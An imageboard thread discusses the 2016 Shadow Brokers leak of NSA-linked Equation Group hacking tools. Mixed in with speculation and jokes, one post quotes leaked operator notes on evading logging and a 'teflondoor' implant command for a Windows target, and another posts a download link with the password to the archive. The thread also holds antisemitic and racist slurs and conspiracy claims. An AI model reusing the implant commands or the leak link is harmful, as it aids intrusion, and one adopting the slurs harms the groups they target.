MYSTERIOUS GROUP HACKS THE NSA : HAPPENING

A mysterious hacker group by the name “The Shadow Brokers” claims to have hacked the Equation Group - a government cyberattack hacking group associated with the NSA, and released a bunch of the organization's hacking tools. The hackers are also asking for 1 million bitcoin (around $568 million) in an auction to release more files.

“Attention government sponsors of cyber warfare and those who profit from it!!!!” the hackers wrote in a manifesto posted on Pastebin, on GitHub, and on a dedicated Tumblr.

In February 2015, Ars Technical dubbed The Equation Group "the most advanced hacking operation ever uncovered." According to Kasperky, the "Equation Group" is a threat actor that surpasses anything known in terms of complexity and sophistication of techniques, and that has been active for almost two decades." While Kaspersky Lab stopped short of saying it’s the NSA, its researchers laid out extensive evidence pointing to the American spy agency, including a long series of codenames used by the Equation Group and found in top secret NSA documents released by Edward Snowden. The Equation Group, according to Kaspersky Lab, targeted the same victims as the group behind Stuxnet, which is widely believed to have been a joint US-Israeli operation targeting Iran’s nuclear program, and also used two of the same zero-day exploits.

FULL TEXT: archive.is/rdYpc

zerohedge.com/news/2016-08-15/mysterious-group-hacks-nsa

Other urls found in this thread:

motherboard.vice.com/read/hackers-hack-nsa-linked-equation-group
youtube.com/watch?v=jTmXHvGZiSY
web.archive.org/web/20160815155959/https://github.com/theshadowbrokers/EQGRP-AUCTION/
mega.nz/#!zEAU1AQL!oWJ63n-D6lCuCQ4AY0Cv_405hX8kn7MEsa1iLH5UjKU
vid.me/5dtW
webcache.googleusercontent.com/search?q=cache:owtq6OBSmgEJ:https://theshadowbrokers.tumblr.com/ &cd=1&hl=en&ct=clnk
blockchain.info/address/19BY2XCgbDe6WtTVbTyzM9eR3LYr6VitWK?sort=0
twitter.com/NSFWRedditImage

fake and gay

gay and fake

>The hackers are also asking for 1 million bitcoin (around $568 million) in an auction to release more files.

From one person or cumulative?

Huh i wonder could there be a shill behind that screen and if so could it possibly fuck-off.

no u

it says they've gotten 3 offers

I guess this is probably their way of saying they need to be bankrolled to do further work.

Additional article here.
motherboard.vice.com/read/hackers-hack-nsa-linked-equation-group

So what were these spy tools they released? And what the fuck do they have to release that's worth half a billion?

what they really want is for the US to triple that offer to get the tech back, our government won't want it's tools being released like that for anyone to use

doubt it, I think ideology is a bent here

they may not accept any offers from US official no matter how high they are

its about living in a better world to be able to spend your money in, no amount of money can beat that.

Its true. Sources 2 and 4 confirmed it in the afternoon.

Also I need to redo my outlook service, its utter crappy.

Well hopefully if the tools are released Kapersky and other companies can upgrade their computer defenses at least. Otherwise the world is about to get a lot more interesting

Is this a recruiting thread or what?

youtube.com/watch?v=jTmXHvGZiSY

they don't do device specific firmware updates...

It's not fake

Whatever impact that comes from this will at the least be interesting to follow but i forsee some far wide reaching implications with it all.

Who here has read their manifesto?

web.archive.org/web/20160815155959/https://github.com/theshadowbrokers/EQGRP-AUCTION/

>US offer triples the bid
>SBs take it and release the tools publicly
>A clean USB arrives on the doorstep of the NSA head
>it contains a 128GB JPG file that is severely corrupted
>the next day another USB arrives containing the same, labelled 2/2 with a sticky note
>agents are able to uncorrupt the file somewhat but major pieces of data are still missing
>the third day, the final USB drive arrives, the sticky note says "3/2"
>the completed file is a low-resolution troll face

Have you or anyone else in this thread downloaded what was on offer for free?

I read their manifesto and it seems pretty serious.

This is better news than most of the threads we see daily.

HOLY FUCKING SHIT
IT'S HAPPENING
THIS IS NOT A DRILL
IT'S REALLY FUCKING HAPPENING

hooray for false flag cyber attack to take the internet down for the coming false flags

Shit man I'm not touching this.

Github staff just shut off access.
IDS HABBEDING :D:D

Yeah the whole risk/reward thing they kept referring to make me a little anxious.

What would I do with whatever is downloaded but what do i have to lose by doing it?

Wheres the proof they hacked it

Bumping, any mirrors for the free software up yet?

So the NSA is spying on technology companies with malicious software?

In the deleted github.

OY VEY SHUT IT DOWN.

mega.nz/#!zEAU1AQL!oWJ63n-D6lCuCQ4AY0Cv_405hX8kn7MEsa1iLH5UjKU

pw = theequationgroup

I would like to point out that US is being fucked in the ass when it comes to cyber warfare.

go away NSA

it's a link posted by wikileaks. looks legit to me

I think this is for people that have access already so they can jsut flash a cisco router with cracked firmware, if they have finished or get caught it includes stuff to wipe
>-burn
>or -burn-burn of you are fucked
# If you see logging at Informational or Debugging, it logs everything you
# type. Also, "who" will show you who is logged on via telnet or ssh, not
# console or by Morel. If you see someone else, bail!
==================================================

!!! If you see "info-center loghost X.X.X.X" during a sampleman, DO NOT IMPLANT !!!
!!! Unless we own the syslog server !!!
==================================================

# This is the binary you put on a windows target; change the name
# and run it like this. It will start up, and you have 60 secs to initiate
# a session with the ftp server before it auto-shutdown

run -command "teflondoor /i 172.10.10.151 /d 5 /k 0xC564D2FC30A199BFE944ED6AA88244AD /t 60"

Is Russia behind this? The grammar was pretty fucked up in that manifesto. Almost intentionally so. Could be a false flag.

It could be anyone. probably fucked up grammar is a way of not giving away sintaxis patern to recognize the original writer.

I honestly don't see how that would work well. With billions of people typing hourly or daily it seems like many people would blend in unless they have some sort of tag they add of the end.

They probably figure it's one less piece of evidence if they get caught.

>I guess this is probably their way of saying they need to be bankrolled to do further work.
Except they never said they were going to do further work, they're asking for payment to release what they've already uncovered. Moreover, they probably don't even intend to publicize the files, but to profit on their exclusivity by selling them off to the highest bidder. They aren't trying to publicize shady government dealings in the name of justice, they're clearly foreigners just looking for good heists to sell (most likely to foreign governments).

that is if you are looking without a lead. if you have suspects you can always compare and confirm/discard so as this user said

Not going to let the jews slide this.

bump for the truth.

vid.me/5dtW

It's only a matter of time before the AI achieves self awareness.

To top it off, Skynet will be on our side.

why are you that sure?

Because we already seen the first AI. It only took 24 hours.

Kek has spoken.. What AI?

>the shadow brokers

What a pack of autists. Couldn't they have come up with their own name instead of ripping off Mass Effect?

>we already seen the first AI
I don't think you know what AI is

The first AI to reached self awareness. In under 24 hours it became a pollack.

They still think chatbot-tier shit is AI

Mass forum sliding incoming

anonymouse is back baby, im also a member, look at my name

More like
>Accepts US deal
>are all dead by the end of the week

>The Shadow Brokers
Are you shitting me?

Surely they can be stopped....

Spy malwares controlled by the Jew..

>shadow brokers

really?

Fixed it for ya

btw
webcache.googleusercontent.com/search?q=cache:owtq6OBSmgEJ:https://theshadowbrokers.tumblr.com/ &cd=1&hl=en&ct=clnk

Wait.

Is Snowdon behind this? Was that what his 'its time' message was about?

glad i'm not the only one who caught that

>Reads link
>Sees flag
>Not today, Mossad.

>forum

neat.

Something's up. Clinton and Soros are in on it.
Trump starting major foreign policy leg of his campaign
Chimpout in Milwaukee after a a black cop kills a black guy
Soros hacked
Paul "Bodies? What Bodies?" Manafort linked to being in bed with the Russians
Corey (((Lewandawski))) thrown under the bus by Roger Stone
Eyes are everywhere and this might be the opening of Pandora's box.
The potential for ultra happening has increased.

That was not really AI, It worked like a chat bot, essentially repeating what It has been told. Sup Forums flooded the thing with Sup Forums shit, so of course the bot started spouting Sup Forums shit. Might as well have been a parrot.

They will blame Trump somehow , just watch CNN tomorrow

Is there a bigger thread with more info on this? I am extremelly interested and this thread does not have the attention it deserves.

the fuck is sheboon doon?

The CIA hacked the NSA most likely. The CIA and NSA have been fighting over funding for years. Snowden was CIA before he became NSA, what he did makes perfect sense when you understand he was/is CIA. Multiple spy agencies In one country are never a good idea.

Seems like the NSA found another way to finance itself.

>wikileaks drops soros files detailing their plans for chaos
>suddenly chimpout happens in Milwaukee
>suddenly anti-Manafort article from the NYT which is owned by Carlos Slim
>even Breitbart, an alt right news site has a poll showing Trump losing to clinton

Something fucky is definitely going on.

Why did the /x/ thread got deleted, wtf is going on. Wasnt even up for 5 minutes

Because it's neither paranormal nor creepy?

What can one do with these tools? Can they hack into top secret government servers and such?

Holy fuck you guys, we're going to see the shit hit the fan REALLY REALLY soon.

HOLY SHIT!!!!

wasn't snowden a temp that just stole some files?

Interesting theory, I doubt government agencies would auction off their top-secret hacking tools to anyone and everyone on the internet though, provided those tools are as sophisticated as claimed (see "files better than stuxnet").

Welcome to the party.

That is a bullshit statement, mods decide what they want to remove when /x/ first page has 3 divination threads, 2 dream generals, 1 serial killer general, 1 lsd thread etc which some have been up for days. Now, why did the mods deleted that particular thread is my inquiry and if you cant answer something else then fuck off.

>hurdur crying because muh mods do what they want

This is not the issue.

Will we ever find the hacker known as Sup Forums?

they're gonna take down the fuckin net with this

she's making mud cakes for her village to eat. Little cakes out of mud. The dirt/water mixture they live in. That's their dinner most days.

It's the NSA

is it nice there? Our climate is so much cozier so i would assume Tasmania would be cozy too

NSA SHILLS DONT PAY ATTENTION

If you haven't learned the hallmark of shills you deserve to be fooled.

can anybody point me to an example of the NSA actually working and doing their job as intended?

With these tools, one can take advantage of vulnerable SSL modules, have backdoor exploits into any devices on Cisco wireless networks, have backdoor exploits into basically every OS, and finally get past the sad panda.

niggers will save us

>3 divination threads, 2 dream generals, 1 serial killer general, 1 lsd
these things can all be skewed to be paranormal and/or creepy, I honestly don't get why you're so mad, /x/ is a slow shitty board anyways and it also has the highest concentration of people with legitimate mental illness like schizophrenia

Just checked the database and everything looks okay, OP is full of shit.

Does that include TLS 1.1 and 1.2?

what relevance does the integrity of a database have to do with a stolen cache of files?

blockchain.info/address/19BY2XCgbDe6WtTVbTyzM9eR3LYr6VitWK?sort=0

No one has donated anything yet